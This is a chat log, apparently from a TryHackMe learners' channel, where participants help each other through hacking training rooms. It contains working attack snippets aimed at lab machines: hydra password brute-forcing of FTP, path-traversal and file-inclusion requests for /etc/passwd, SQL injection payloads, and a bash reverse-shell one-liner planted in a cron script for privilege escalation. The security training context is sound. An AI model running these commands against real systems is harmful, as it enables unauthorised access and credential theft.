-t 64 as well and its taking a while

I guess ill just wait

maybe

i'm bad at hydra btw! I haven't learned it properly

it shouldn't have taken that much time

I'm trying to crack the password for eddie

lol

Which port do you use? ftp? Which port is the ftp service listening?

||ftp, port 10021||

I've checked that it is actually working with -d

That’s right. Shouldn’t take too long.

it says it's gonna take 342 minutes lmao

Took only a few seconds to find passwords of both users

hmm

Should be a little less than a minute for both.

Try ftp://IPADDRESS:10021

If they take longer then something's wrong.

Worked pretty well for me

Pretty sure port isn't the flag you should be using. Look at the manual.

I'm not using the flag "port", I was using -S

Got it

When I login with FTP should I just use ls -a to find the flag?

@wanton prism same here. I did the ' OR 1=1;-- statement and I am able to go to level 3 task, but flag is the same as was in Task 5. Did you manage to get right flag for Task 6 ?

Hah, you just need to click Level 3, and correct flag will pop out.

i absolutely hate file inclusion

why does the challenge 3 request work with forward through proxy but not when using burps repeater? can someone explain because im struggling to understand and i wasted so much time with spamming the same request through the repeater

is burp suite needed for challenge 3?

ok ty

hmmm I'm at attempt 26000 of the quinn user

using the exact same command that worked with the eddie user but obviously with quinn instead of eddie

||POST /challenges/chall3.php HTTP/1.1
Host: 10.10.101.220
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://10.10.101.220
DNT: 1
Connection: close
Referer: http://10.10.101.220/challenges/chall3.php
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

file=../../../etc/flag3%00||

ive been trying this all day already

and then ive asked @burnt orchid for help and then they told me theyve used the same, but i should try it with a direct proxy request forward and then it suddenly worked.

Anyone want to team up for burpsuite or networksecurity?

The repeater request works too. why tho? ive been jumping so many machines because i took so long they always expired

hdym? it worked

nope

location of chall3.php doesnt count as it is the origin

this can't be right
I'm at attempt 55000
is this command correct? || hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.52.232:10021 -t 64 -V||

can someone help me with local file inclusion?

why is this wrronggg?

||http://10.10.28.252/lab1.php/etc/passwd||

why is this wrong?

This one worked for me but I used less info on POST

the question says to read the /etc/passwd file. By just entering the/etc/passwd path in the URL, it will not read it

umm what should i enter?

In the last challenge, gain RCE with RFI am i suppose to make a webserver?

@steel nymph know if this command is correct?

hdym less info?

Well I looked at a writeup and it said you need to use the quinn user and password

uhm hy? 😄

||lab1.php/get.php?file=/etc/passwd||

why is this wrtong?

you need to query for the file. think what we use to query and add the path there

reeeeeee

@steel nymph is there anything pre-build in the THM AttackBox where i need to take a look at for making webserver?

hm ok

Where I can find username and password

How ?

-v

Anybody having intermittent connection drops to boxes over openvpn?

Add it to the command

bro use scrot or something I can't even read that lmfao

Is the same result

When the event is over, does the room close? or are just the ticketing system disabled?

just tickets

thank you

@steel nymph is this the wrong way? does it have to be php?

how did you manage to get that request? I've been trying for days but i copy this and it worked lol

make sure youre at the same directory as the valid names.txt

Is the same

it's just top something list, not the full one

why are you filtering 200?

Anyone have any problems opening up the website for xss task 8? I get https://machine_IP.p.thmlabs.com as the link. I copy and paste into my attackbox browser to open it, and get certificate issues warning. I accept and continue and then get 504. I've run nmap and tried using just http, which gives me the nginx page. I've even tried port 9999, but can't connect. I've terminated and restarted the web machine 3x and terminated by attackbox once.

In bypass authentication task 3

your valid_username.txt file name is custom, it shouldn't matter but anyways -> is the content of the file correct and have the specific usernames you found?

thanks mate

Gave +1 Rep to @steel nymph

http://add_the_machine_ip_address

also check that you are at the correct IP. there the "active machine ip" you need not the one all the way at the top nav bar

No

is it in the same dir?

Yes

Thank you so much 😊

Hey guys, can someone link me to a nice SSRF explanation? Because the room alone is not enough for me

When I run my webserver it gives back the hostname but when I put it into the Lab is says couldn't connect to server?

Thanks bro!

Gave +1 Rep to @steel nymph

ahh

does it matter if it's a file or happens when getting on landingpage?

haha

Remote FILE Inclusion, my bad

The method of the form (say the input) is specified in the Source code. You can simply switch it to post by editing with dev tools. Then you can query with a test or empty value and catch the request with burps proxy

Yeah, I tried that but I guess I was doing it wrong. I don't like to copy paste, feels like cheating haha

If you copy and paste, you should try to understand why the copypasta works. Youre playing yourself if not. And real assessments are going to give u a hard time if you dont know the attack surface.

for god sake am stuck at linux priv room i cant get a reverse shell on task 9 cron jobs

bash -i >& /dev/tcp/ip/4444 0>&1

put that in /home/karen/backup.sh

and listening with nc -lvnp 4444

ין בש

מ שמטםמק

יקךפ

hi ca

n anyone help

sqlinjectionv2 room?

it works

like that

but with root

no

if i execute it myself it works but i need root to run it

crontab says the script works every minute

like that

will try it with attack box

now i understand xd

xdddd

in time based injection i cant seem to find the domain any help?

query admin123' UNION SELECT SLEEP(2),2 FROM ||analytics_referrers|| WHERE ||domain|| like'%

i did found the table name but cant find the query after that

sry i found the column name too

why would u use that table

Hi, for linux privEsc task 6, I have no idea how to continue from this point

karen@ip-10-10-9-123:/$ sudo cat /etc/shadow
[sudo] password for karen:
Sorry, user karen is not allowed to execute '/usr/bin/cat /etc/shadow' as root on ip-10-10-9-123.eu-west-1.compute.internal.
karen@ip-10-10-9-123:/$ cat etc/shadow
cat: etc/shadow: Permission denied

Please help

I left with this question "What is the hash of frank's password?"

I follow the task using LD_PRELOAD=/tmp/shell.so find and cat flag2.txt already. But it still shows access denied when reading etc/shadow

I got following after sudo -lMatching Defaults entries for karen on ip-10-10-9-123:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User karen may run the following commands on ip-10-10-9-123:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano

Got it. Thank you👍

How can i put a specific file on my python webserver? i cant figure it out

https://tryhackme.com/room/burpsuiteintruder Task 8: What would the body parameters of the first request that Burp Suite sends be? Stuck on this one and would like some help on battering ram!

yeah I looked at hint and tried several things but still don't understand

Does the answer have "§" symbols?

Ah, it was just formatting - thanks!

Am i doing something wrong @steel nymph? I have in the folder of the webserver.py file another folder which contains 2 files. A php script and a text file for testing but i cant reach both of them.

haha ok it is working now:)

ah

🥳

gf 😄

but ssrf also same

How's the level?

I'll be doin that once i get a subscription

well I didnt expected to be working on this single room for like 4 hours lol

atleast it was worth the 4

4 hours? very good. it took my 2 days 😄

it was 3 days for me

LOL

BUT we learned something

what about ssrf btw 😄

yes was very educating

sure

im stuck there now

hahaha

but i study it-security so i should do better lol

i will catch up soon

hi, I am on linux privesc, task 8, third question. Don't understand what do I have to answer here

You guys had any good tickets so far?

I was hoping for the OSCP voucher

but no luck for me

If I retrieve all them, I think that have like 3 weeks of streak, 3 days streaks complete, 2 Pentester titles... And nothing else. Throwback: 2 cards, 1 month and 3 month 2x... Nothing else

Forget the tickets its over

too late

i have kinda the same

till 27th right?

yeah but all the good stuff have been redeemed